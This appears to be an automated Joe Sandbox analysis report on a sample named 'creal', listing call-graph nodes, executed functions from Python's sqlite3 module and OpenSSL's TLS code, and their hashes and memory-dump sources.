102130->102134 102132 7ff8e6933136 102135 7ff8e69dabc0 8 API calls 102132->102135 102140 7ff8e6932e46 102133->102140 102198 7ff8e68b69b0 13 API calls new[] 102133->102198 102197 7ff8e68ba3b0 16 API calls 102134->102197 102137 7ff8e6932120 102135->102137 102137->102057 102137->102062 102137->102063 102139 7ff8e6932e1f 102139->102140 102141 7ff8e6932e27 memcpy 102139->102141 102154 7ff8e6932eec 102140->102154 102199 7ff8e68b69b0 13 API calls new[] 102140->102199 102142 7ff8e696ccb0 14 API calls 102141->102142 102142->102140 102143 7ff8e6933064 102148 7ff8e6932cac 102143->102148 102204 7ff8e68ba3b0 16 API calls 102143->102204 102196 7ff8e68ba3b0 16 API calls 102145->102196 102146 7ff8e6932f00 102146->102143 102203 7ff8e68e4a40 69 API calls 102146->102203 102147 7ff8e6932ecf 102152 7ff8e6932ed7 memcpy 102147->102152 102147->102154 102205 7ff8e6932900 memset 102148->102205 102152->102154 102153 7ff8e68d2ba0 49 API calls 102153->102154 102154->102146 102154->102148 102154->102153 102200 7ff8e68b6db0 13 API calls 102154->102200 102201 7ff8e690fb70 10 API calls 102154->102201 102202 7ff8e68d3f60 55 API calls 102154->102202 102158->102074 102161 7ff8e696f135 102159->102161 102166 7ff8e696f338 102159->102166 102161->102166 102224 7ff8e696f530 102161->102224 102162 7ff8e696f1e1 102168 7ff8e696f1f8 102162->102168 102236 7ff8e6919630 10 API calls 102162->102236 102165 7ff8e696f18d 102165->102162 102230 7ff8e68d1fc0 102165->102230 102166->102076 102168->102166 102237 7ff8e6910020 memset 102168->102237 102169->102050 102170->102054 102171->102057 102172->102072 102173->102057 102174->102064 102175->102070 102176->102067 102191 7ff8e696cd01 102177->102191 102179 7ff8e696d120 102217 7ff8e68b94b0 13 API calls 102179->102217 102181 7ff8e696d0c9 102216 7ff8e68ba550 13 API calls 102181->102216 102182 7ff8e696d00e 102182->102179 102183 7ff8e696d13d 102182->102183 102185 7ff8e68b92e0 13 API calls 102182->102185 102188 7ff8e696d1de 102183->102188 102218 7ff8e6910020 memset 102183->102218 102185->102179 102186 7ff8e69dabc0 8 API calls 102189 7ff8e696d280 102186->102189 102193 7ff8e696d237 102188->102193 102219 7ff8e6942d70 memset 102188->102219 102189->102140 102191->102181 102191->102182 102206 7ff8e696c100 102191->102206 102192 7ff8e696d205 102192->102193 102220 7ff8e68fbb70 memset 102192->102220 102193->102186 102195->102148 102196->102148 102197->102148 102198->102139 102199->102147 102200->102154 102201->102154 102202->102154 102203->102143 102204->102148 102205->102132 102209 7ff8e696c144 102206->102209 102207 7ff8e696c267 102211 7ff8e696c2ae 102207->102211 102212 7ff8e696c29b 102207->102212 102215 7ff8e696c240 102207->102215 102208 7ff8e696c222 102208->102215 102221 7ff8e6969370 13 API calls 102208->102221 102209->102207 102209->102208 102223 7ff8e68ba550 13 API calls 102211->102223 102222 7ff8e68ba550 13 API calls 102212->102222 102215->102191 102216->102182 102217->102183 102219->102192 102220->102193 102221->102215 102222->102215 102223->102215 102225 7ff8e696f55f 102224->102225 102227 7ff8e696f5cf 102225->102227 102238 7ff8e68d40d0 102225->102238 102229 7ff8e696f634 102227->102229 102250 7ff8e690fc00 10 API calls 102227->102250 102229->102165 102231 7ff8e68d1fd8 102230->102231 102232 7ff8e68d40d0 39 API calls 102231->102232 102234 7ff8e68d1ff3 102232->102234 102233 7ff8e68c87b0 45 API calls 102235 7ff8e68d20c5 102233->102235 102234->102233 102234->102235 102235->102165 102236->102168 102239 7ff8e68d40f7 102238->102239 102242 7ff8e68d411c 102239->102242 102255 7ff8e68cf640 17 API calls 102239->102255 102243 7ff8e68d4140 102242->102243 102256 7ff8e68d3fc0 17 API calls 102242->102256 102247 7ff8e68d41dd 102243->102247 102257 7ff8e68caf90 35 API calls 102243->102257 102246 7ff8e68d41fa 102246->102225 102251 7ff8e68d3c80 102247->102251 102248 7ff8e68d4157 102248->102247 102258 7ff8e68c6ff0 35 API calls 102248->102258 102250->102229 102254 7ff8e68d3cad 102251->102254 102252 7ff8e68d3cba 102252->102246 102254->102252 102259 7ff8e68c6ff0 35 API calls 102254->102259 102255->102242 102256->102243 102257->102248 102275 7ff8e68c9ab0 102260->102275 102263 7ff8e68d2969 102268 7ff8e68d28b4 102263->102268 102301 7ff8e68c6ff0 35 API calls 102263->102301 102264 7ff8e68d27b1 102264->102263 102267 7ff8e68d28a4 102264->102267 102264->102268 102299 7ff8e68cb7f0 memset 102264->102299 102267->102263 102267->102268 102300 7ff8e6972590 13 API calls 102267->102300 102268->102083 102270 7ff8e68c9e80 38 API calls 102270->102264 102271->102083 102272->102083 102274->102078 102276 7ff8e68c9d67 102275->102276 102287 7ff8e68c9ae0 102275->102287 102280 7ff8e68c9e0e 102276->102280 102305 7ff8e68ce140 22 API calls 102276->102305 102277 7ff8e68c9b7e 102281 7ff8e69dabc0 8 API calls 102277->102281 102279 7ff8e68c6a40 memset 102279->102277 102280->102277 102280->102279 102282 7ff8e68c9e69 102281->102282 102282->102268 102282->102270 102283 7ff8e68c9ca8 102289 7ff8e68c9ccd 102283->102289 102298 7ff8e68bdc50 22 API calls 102283->102298 102284 7ff8e68c9b71 102288 7ff8e68c6a40 memset 102284->102288 102285 7ff8e68c9dc9 102285->102280 102285->102285 102286 7ff8e68c40e0 memset 102285->102286 102286->102280 102287->102276 102287->102280 102287->102283 102287->102284 102294 7ff8e68c9b83 102287->102294 102288->102277 102289->102276 102289->102280 102304 7ff8e68cb7f0 memset 102289->102304 102290 7ff8e68c9c75 102290->102283 102291 7ff8e68c9c94 102290->102291 102296 7ff8e68c6a40 memset 102291->102296 102292 7ff8e68c9c32 102292->102290 102292->102291 102303 7ff8e68c7890 20 API calls 102292->102303 102294->102280 102294->102292 102302 7ff8e69725d0 13 API calls 102294->102302 102296->102277 102298->102289 102299->102267 102300->102263 102302->102292 102303->102290 102304->102276 102305->102285 102315 7ff8e68b7030 102306->102315 102309 7ff8e68b9296 102310 7ff8e68b92af 102309->102310 102327 7ff8e68b6db0 13 API calls 102309->102327 102312 7ff8e69dabc0 8 API calls 102310->102312 102313 7ff8e68b92c2 102312->102313 102313->102089 102317 7ff8e68b707c 102315->102317 102316 7ff8e69dabc0 8 API calls 102318 7ff8e68b87f7 102316->102318 102319 7ff8e68b711a 102317->102319 102320 7ff8e68b710a 102317->102320 102322 7ff8e68b87bc 102317->102322 102325 7ff8e68b7118 102317->102325 102318->102309 102326 7ff8e68b8e30 13 API calls new[] 102318->102326 102324 7ff8e68b711e memcpy 102319->102324 102319->102325 102328 7ff8e68b8d60 13 API calls 102320->102328 102322->102316 102324->102325 102325->102322 102329 7ff8e68b8d60 13 API calls 102325->102329 102326->102309 102327->102310 102328->102325 102329->102322 102331 7ff8e69331ee 102330->102331 102333 7ff8e6933198 102330->102333 102332 7ff8e6933210 102331->102332 102331->102333 102334 7ff8e69331b0 102332->102334 102338 7ff8e6933215 102332->102338 102374 7ff8e68b94b0 13 API calls 102333->102374 102375 7ff8e68b94b0 13 API calls 102334->102375 102337 7ff8e69331da 102337->102112 102339 7ff8e6932bb0 79 API calls 102338->102339 102340 7ff8e693330d 102338->102340 102376 7ff8e6919630 10 API calls 102338->102376 102339->102338 102340->102112 102343 7ff8e68e7ea5 102342->102343 102344 7ff8e68e7e94 102342->102344 102346 7ff8e68e7ebb 102343->102346 102393 7ff8e68b94b0 13 API calls 102343->102393 102392 7ff8e68b94b0 13 API calls 102344->102392 102347 7ff8e68e7ea3 102346->102347 102349 7ff8e68e7eff 102346->102349 102394 7ff8e68b94b0 13 API calls 102347->102394 102377 7ff8e68e7bf0 102349->102377 102351 7ff8e68e7ef2 102351->102112 102355 7ff8e68e7f23 102356 7ff8e68e7f79 102355->102356 102358 7ff8e68e7bf0 69 API calls 102355->102358 102360 7ff8e68e7f74 102355->102360 102395 7ff8e6933380 79 API calls 102355->102395 102396 7ff8e68e6d60 69 API calls 102355->102396 102359 7ff8e68e7f85 102356->102359 102397 7ff8e68e0690 16 API calls 102356->102397 102358->102355 102359->102360 102398 7ff8e68b69b0 13 API calls new[] 102359->102398 102360->102112 102362 7ff8e68e8007 102362->102360 102363 7ff8e68e800f memcpy 102362->102363 102363->102360 102364->102093 102365->102095 102366->102112 102367->102112 102368->102112 102369->102112 102370->102099 102371->102107 102372->102107 102373->102103 102374->102334 102375->102337 102376->102338 102381 7ff8e68e7c0d 102377->102381 102389 7ff8e68e7c65 102377->102389 102378 7ff8e68e7c2c 102382 7ff8e68e7c35 102378->102382 102378->102389 102379 7ff8e68e7ce5 102399 7ff8e68eabe0 102379->102399 102380 7ff8e68e7cde 102408 7ff8e68e2f50 16 API calls 102380->102408 102381->102378 102381->102389 102406 7ff8e68e6d60 69 API calls 102381->102406 102391 7ff8e68e7cfd 102382->102391 102407 7ff8e68e4940 16 API calls 102382->102407 102387 7ff8e68e7c56 102387->102355 102388 7ff8e68e7ce3 102388->102391 102409 7ff8e68e4940 16 API calls 102388->102409 102389->102379 102389->102380 102391->102355 102392->102347 102393->102346 102394->102351 102395->102355 102396->102355 102397->102359 102398->102362 102400 7ff8e68eac6f 102399->102400 102405 7ff8e68eacdc 102400->102405 102410 7ff8e68b6db0 13 API calls 102400->102410 102402 7ff8e68f12eb 102411 7ff8e68e0f90 13 API calls 102402->102411 102404 7ff8e68f12fa 102404->102388 102405->102388 102406->102381 102407->102387 102408->102388 102409->102391 102410->102402 102411->102404 102412 7ff8e7215dc0 102413 7ff8e7215ddf 102412->102413 102414 7ff8e7215fdc 102413->102414 102415 7ff8e7215f73 EVP_MD_CTX_get0_md 102413->102415 102447 7ff8e7215ef3 102413->102447 102416 7ff8e721610e 102414->102416 102418 7ff8e7216117 102414->102418 102427 7ff8e721600c 102414->102427 102415->102414 102419 7ff8e7215f84 EVP_MD_CTX_get0_md EVP_MD_get_size 102415->102419 102417 7ff8e72160a9 102416->102417 102416->102418 102422 7ff8e72160be 102417->102422 102444 7ff8e72161ec 102417->102444 102467 7ff8e71d1217 CRYPTO_zalloc ERR_new ERR_set_debug ERR_set_error CRYPTO_free 102418->102467 102419->102414 102421 7ff8e7215fa0 ERR_new ERR_set_debug 102419->102421 102421->102447 102466 7ff8e71d1217 CRYPTO_zalloc ERR_new ERR_set_debug ERR_set_error CRYPTO_free 102422->102466 102423 7ff8e7216148 102425 7ff8e7216174 ERR_new ERR_set_debug 102423->102425 102431 7ff8e7216100 102423->102431 102425->102447 102426 7ff8e72160d8 102430 7ff8e72161b0 ERR_new ERR_set_debug 102426->102430 102426->102431 102427->102417 102437 7ff8e721606e ERR_new ERR_set_debug 102427->102437 102427->102447 102429 7ff8e7216361 memset 102432 7ff8e721674c 102429->102432 102463 7ff8e7216387 102429->102463 102430->102447 102431->102429 102440 7ff8e72162d7 EVP_CIPHER_CTX_get0_cipher EVP_CIPHER_get_mode 102431->102440 102433 7ff8e721677f 102432->102433 102434 7ff8e7216806 102432->102434 102470 7ff8e71d2716 32 API calls 102433->102470 102441 7ff8e7216819 102434->102441 102455 7ff8e7216838 102434->102455 102435 7ff8e7216326 ERR_new 102438 7ff8e7216aee ERR_set_debug 102435->102438 102437->102447 102438->102447 102439 7ff8e7216784 102443 7ff8e721678d 102439->102443 102439->102455 102442 7ff8e72162ee EVP_CIPHER_CTX_get_iv_length 102440->102442 102446 7ff8e7216335 102440->102446 102441->102447 102448 7ff8e7216829 ERR_new 102441->102448 102445 7ff8e72162fe ERR_new ERR_set_debug 102442->102445 102442->102446 102443->102447 102449 7ff8e721679d ERR_new 102443->102449 102444->102431 102444->102435 102468 7ff8e71d1217 CRYPTO_zalloc ERR_new ERR_set_debug ERR_set_error CRYPTO_free 102444->102468 102445->102447 102446->102429 102448->102438 102449->102438 102450 7ff8e7216ae4 ERR_new 102450->102438 102451 7ff8e72167f7 ERR_new 102451->102438 102452 7ff8e7216ad8 ERR_new 102452->102438 102453 7ff8e7216aa1 ERR_new 102453->102438 102454 7ff8e7216acc ERR_new 102454->102438 102455->102447 102455->102450 102455->102452 102455->102453 102455->102454 102456 7ff8e7216aad 102455->102456 102456->102447 102459 7ff8e7216ab2 ERR_new 102456->102459 102457 7ff8e7216548 ERR_new ERR_set_debug 102457->102447 102458 7ff8e72167e8 ERR_new 102458->102438 102459->102438 102460 7ff8e72167d9 ERR_new 102460->102438 102461 7ff8e72167bb ERR_new 102461->102438 102462 7ff8e72167ca ERR_new 102462->102438 102463->102432 102463->102451 102463->102457 102463->102458 102463->102460 102463->102461 102463->102462 102465 7ff8e72167ac ERR_new 102463->102465 102469 7ff8e71d234c memset 102463->102469 102465->102438 102466->102426 102467->102423 102468->102444 102469->102463 102470->102439 102471 7ff8e7241360 102472 7ff8e7241378 102471->102472 102473 7ff8e72414bd 102472->102473 102474 7ff8e72414b6 102472->102474 102476 7ff8e7241486 ERR_new ERR_set_debug 102472->102476 102473->102474 102475 7ff8e724151e ERR_new ERR_set_debug 102473->102475 102475->102474 102476->102474

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 00007FF8E7007C38 Relevance: 131.6, APIs: 48, Strings: 27, Instructions: 310COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 169 7ff8e7007c38-7ff8e7007c50 sqlite3_libversion_number 170 7ff8e7007c56-7ff8e7007c5e sqlite3_initialize 169->170 171 7ff8e700d860-7ff8e700d867 169->171 173 7ff8e700d869-7ff8e700d871 sqlite3_errstr 170->173 174 7ff8e7007c64-7ff8e7007c6e call 7ff8e7008150 170->174 172 7ff8e700d874-7ff8e700d87e PyErr_SetString 171->172 175 7ff8e700d884 172->175 173->172 179 7ff8e7007c74-7ff8e7007c7e call 7ff8e7008198 174->179 180 7ff8e7008143-7ff8e700814a sqlite3_shutdown 174->180 178 7ff8e700d88c-7ff8e700d88f 175->178 181 7ff8e700d8ab-7ff8e700d8b1 178->181 182 7ff8e700d891-7ff8e700d8a6 PyErr_Format 178->182 179->180 187 7ff8e7007c84-7ff8e7007c8e call 7ff8e70081e0 179->187 180->175 184 7ff8e70080dc-7ff8e70080ee PyModule_AddIntConstant 181->184 182->180 184->180 186 7ff8e70080f0-7ff8e70080fa call 7ff8e70082f8 184->186 186->180 192 7ff8e70080fc-7ff8e7008106 call 7ff8e7008340 186->192 187->180 193 7ff8e7007c94-7ff8e7007c9e call 7ff8e7008224 187->193 192->180 199 7ff8e7008108-7ff8e700812f PyModule_GetState _PyImport_GetModuleAttrString 192->199 193->180 198 7ff8e7007ca4-7ff8e7007cae call 7ff8e700826c 193->198 198->180 203 7ff8e7007cb4-7ff8e7007cbe call 7ff8e70082b4 198->203 199->180 201 7ff8e7008131-7ff8e700813d 199->201 203->180 206 7ff8e7007cc4-7ff8e7007cdf PyModule_GetState PyModule_AddType 203->206 206->180 207 7ff8e7007ce5-7ff8e7007cf4 PyModule_AddType 206->207 207->180 208 7ff8e7007cfa-7ff8e7007d0c PyModule_AddType 207->208 208->180 209 7ff8e7007d12-7ff8e7007d24 PyModule_AddType 208->209 209->180 210 7ff8e7007d2a-7ff8e7007d3c PyModule_AddType 209->210 210->180 211 7ff8e7007d42-7ff8e7007d63 PyErr_NewException 210->211 211->180 212 7ff8e7007d69-7ff8e7007d77 PyModule_AddType 211->212 212->180 213 7ff8e7007d7d-7ff8e7007d9e PyErr_NewException 212->213 213->180 214 7ff8e7007da4-7ff8e7007db2 PyModule_AddType 213->214 214->180 215 7ff8e7007db8-7ff8e7007dd3 PyErr_NewException 214->215 215->180 216 7ff8e7007dd9-7ff8e7007de7 PyModule_AddType 215->216 216->180 217 7ff8e7007ded-7ff8e7007e08 PyErr_NewException 216->217 217->180 218 7ff8e7007e0e-7ff8e7007e1c PyModule_AddType 217->218 218->180 219 7ff8e7007e22-7ff8e7007e3d PyErr_NewException 218->219 219->180 220 7ff8e7007e43-7ff8e7007e51 PyModule_AddType 219->220 220->180 221 7ff8e7007e57-7ff8e7007e72 PyErr_NewException 220->221 221->180 222 7ff8e7007e78-7ff8e7007e86 PyModule_AddType 221->222 222->180 223 7ff8e7007e8c-7ff8e7007ea7 PyErr_NewException 222->223 223->180 224 7ff8e7007ead-7ff8e7007ebb PyModule_AddType 223->224 224->180 225 7ff8e7007ec1-7ff8e7007edc PyErr_NewException 224->225 225->180 226 7ff8e7007ee2-7ff8e7007ef0 PyModule_AddType 225->226 226->180 227 7ff8e7007ef6-7ff8e7007f10 PyErr_NewException 226->227 227->180 228 7ff8e7007f16-7ff8e7007f24 PyModule_AddType 227->228 228->180 229 7ff8e7007f2a-7ff8e7007f45 PyErr_NewException 228->229 229->180 230 7ff8e7007f4b-7ff8e7007f59 PyModule_AddType 229->230 230->180 231 7ff8e7007f5f-7ff8e7007f6f PyUnicode_InternFromString 230->231 231->180 232 7ff8e7007f75-7ff8e7007f8c PyUnicode_InternFromString 231->232 232->180 233 7ff8e7007f92-7ff8e7007fa9 PyUnicode_InternFromString 232->233 233->180 234 7ff8e7007faf-7ff8e7007fc6 PyUnicode_InternFromString 233->234 234->180 235 7ff8e7007fcc-7ff8e7007fe3 PyUnicode_InternFromString 234->235 235->180 236 7ff8e7007fe9-7ff8e7008000 PyUnicode_InternFromString 235->236 236->180 237 7ff8e7008006-7ff8e700801d PyUnicode_InternFromString 236->237 237->180 238 7ff8e7008023-7ff8e700803a PyUnicode_InternFromString 237->238 238->180 239 7ff8e7008040-7ff8e7008051 call 7ff8e7008390 238->239 239->180 242 7ff8e7008057-7ff8e7008061 call 7ff8e7008400 239->242 242->180 245 7ff8e7008067-7ff8e7008080 PyModule_AddStringConstant 242->245 245->180 246 7ff8e7008086-7ff8e70080a1 sqlite3_libversion PyModule_AddStringConstant 245->246 246->180 247 7ff8e70080a7-7ff8e70080bd PyModule_AddIntConstant 246->247 247->180 248 7ff8e70080c3-7ff8e70080cd sqlite3_threadsafe 247->248 249 7ff8e700813e-7ff8e7008141 248->249 250 7ff8e70080cf-7ff8e70080d2 248->250 249->184 250->178 251 7ff8e70080d8 250->251 251->184
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Module_$Constant$Type$From$Err_String$Exception$InternStateUnicode_$Module$SpecType_$AttrFormatImport_sqlite3_errstrsqlite3_initializesqlite3_libversionsqlite3_libversion_numbersqlite3_shutdownsqlite3_threadsafe
                                                                                                                                                                                                                • String ID: 2.6.0$LEGACY_TRANSACTION_CONTROL$Unable to interpret SQLite threadsafety mode. Got %d, expected 0, 1, or 2$__adapt__$__conform__$_deprecated_version$executescript$finalize$functools$inverse$lru_cache$sqlite3.DataError$sqlite3.DatabaseError$sqlite3.Error$sqlite3.IntegrityError$sqlite3.InterfaceError$sqlite3.InternalError$sqlite3.NotSupportedError$sqlite3.OperationalError$sqlite3.ProgrammingError$sqlite3.Warning$sqlite3: SQLite 3.7.15 or higher required$sqlite_version$step$threadsafety$upper$value
                                                                                                                                                                                                                • API String ID: 3715894170-1388897118
                                                                                                                                                                                                                • Opcode ID: a4efa3e3f6614b92526c4b3a4b91d8600bed29440f19417f2b8d7921e743ca98
                                                                                                                                                                                                                • Instruction ID: ebabf418fd150d1404c11923a7ce83827944e961efc8bdce32c642106ecb0f5d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4efa3e3f6614b92526c4b3a4b91d8600bed29440f19417f2b8d7921e743ca98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07E1A760B09B0392EE44DBA5E85477E23A4BF46BE4F446835CA3EC6790EF6CF1549312
                                                                                                                                                                                                                Function 00007FF8E7215DC0 Relevance: 65.6, APIs: 34, Strings: 3, Instructions: 829COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_new$R_set_debug$X_get0_md$D_get_sizeR_get_modeX_get0_cipherX_get_iv_length
                                                                                                                                                                                                                • String ID: ..\s\ssl\record\rec_layer_s3.c$U$do_ssl3_write
                                                                                                                                                                                                                • API String ID: 2155623385-3398879041
                                                                                                                                                                                                                • Opcode ID: 36d4d9ddf363054e33d8c3296ed87f71bfe2d0e7d958c3529b07b88d0e93790b
                                                                                                                                                                                                                • Instruction ID: a4d4979ef8b9b14c0ef87bb55214650e1b7dfdd38c59da1f29a53f6a6f807334
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36d4d9ddf363054e33d8c3296ed87f71bfe2d0e7d958c3529b07b88d0e93790b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27729D72A0878282FB209BA5D4507BD23A1FF45BC8F554136EE6E47A8ADF3CE545C702
                                                                                                                                                                                                                Function 00007FF8E71D13D9 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 256COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 654 7ff8e71d13d9-7ff8e7238150 call 7ff8e71d132a OPENSSL_sk_new_null 658 7ff8e723817f-7ff8e723818e 654->658 659 7ff8e7238152-7ff8e723817a ERR_new ERR_set_debug 654->659 661 7ff8e7238190-7ff8e7238197 658->661 662 7ff8e72381c6-7ff8e72381ce 658->662 660 7ff8e7238553-7ff8e7238559 call 7ff8e71d1d93 659->660 670 7ff8e723855e-7ff8e7238593 X509_free OPENSSL_sk_pop_free 660->670 661->662 663 7ff8e7238199-7ff8e723819e 661->663 664 7ff8e723852b-7ff8e7238548 ERR_new ERR_set_debug 662->664 665 7ff8e72381d4-7ff8e72381fb 662->665 663->662 667 7ff8e72381a0-7ff8e72381a7 663->667 669 7ff8e723854e 664->669 665->664 668 7ff8e7238201-7ff8e7238204 665->668 667->664 672 7ff8e72381ad-7ff8e72381c0 667->672 668->664 673 7ff8e723820a-7ff8e723820d 668->673 669->660 671 7ff8e7238595-7ff8e72385a8 670->671 672->662 672->664 674 7ff8e7238210-7ff8e7238214 673->674 675 7ff8e723821a-7ff8e7238241 674->675 676 7ff8e723851c-7ff8e7238526 ERR_new 674->676 675->676 678 7ff8e7238247-7ff8e723827d X509_new_ex 675->678 677 7ff8e723846f-7ff8e7238488 ERR_set_debug 676->677 677->669 679 7ff8e72384ba-7ff8e723851a ERR_new ERR_set_debug call 7ff8e71d1d93 ERR_new ERR_set_debug ERR_set_error 678->679 680 7ff8e7238283-7ff8e723829e d2i_X509 678->680 679->670 681 7ff8e723848d-7ff8e72384b5 ERR_new ERR_set_debug 680->681 682 7ff8e72382a4-7ff8e72382b0 680->682 681->660 684 7ff8e72382b6-7ff8e72382c5 682->684 685 7ff8e7238465-7ff8e723846a ERR_new 682->685 687 7ff8e72382cb-7ff8e72382d2 684->687 688 7ff8e72383cf-7ff8e72383ec OPENSSL_sk_push 684->688 685->677 687->688 689 7ff8e72382d8-7ff8e72382dd 687->689 690 7ff8e72383ee-7ff8e7238400 688->690 691 7ff8e7238456-7ff8e723845b ERR_new 688->691 689->688 692 7ff8e72382e3-7ff8e72382fb 689->692 690->674 693 7ff8e7238406-7ff8e723840a 690->693 691->685 694 7ff8e723842e-7ff8e7238451 ERR_new ERR_set_debug 692->694 695 7ff8e7238301-7ff8e7238321 692->695 693->671 694->669 695->694 696 7ff8e7238327-7ff8e723837b call 7ff8e71d17cb 695->696 699 7ff8e723840f-7ff8e7238429 CRYPTO_free 696->699 700 7ff8e7238381-7ff8e72383b3 call 7ff8e71d2590 696->700 699->670 700->699 703 7ff8e72383b5-7ff8e72383ca CRYPTO_free 700->703 703->688
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: L_sk_new_nullL_sk_pop_freeR_newR_set_debugX509X509_freeX509_new_exd2i_
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem_clnt.c$tls_process_server_certificate
                                                                                                                                                                                                                • API String ID: 3085087540-2730446810
                                                                                                                                                                                                                • Opcode ID: 36e8d79e23d976b740ea242f5129b34b4295ff9e77b271edc4115a9c1831974b
                                                                                                                                                                                                                • Instruction ID: 7e2c34082eae753c903a84f40b2271386a807f41bfff2121e6ff9c1a0ce2cc79
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e8d79e23d976b740ea242f5129b34b4295ff9e77b271edc4115a9c1831974b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBC1F662A08A8292EB20DBA5D4503FD77A1FB84BC4F544132DABE476D6DF3CE481C712
                                                                                                                                                                                                                Function 00007FF8E7218E50 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 125COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
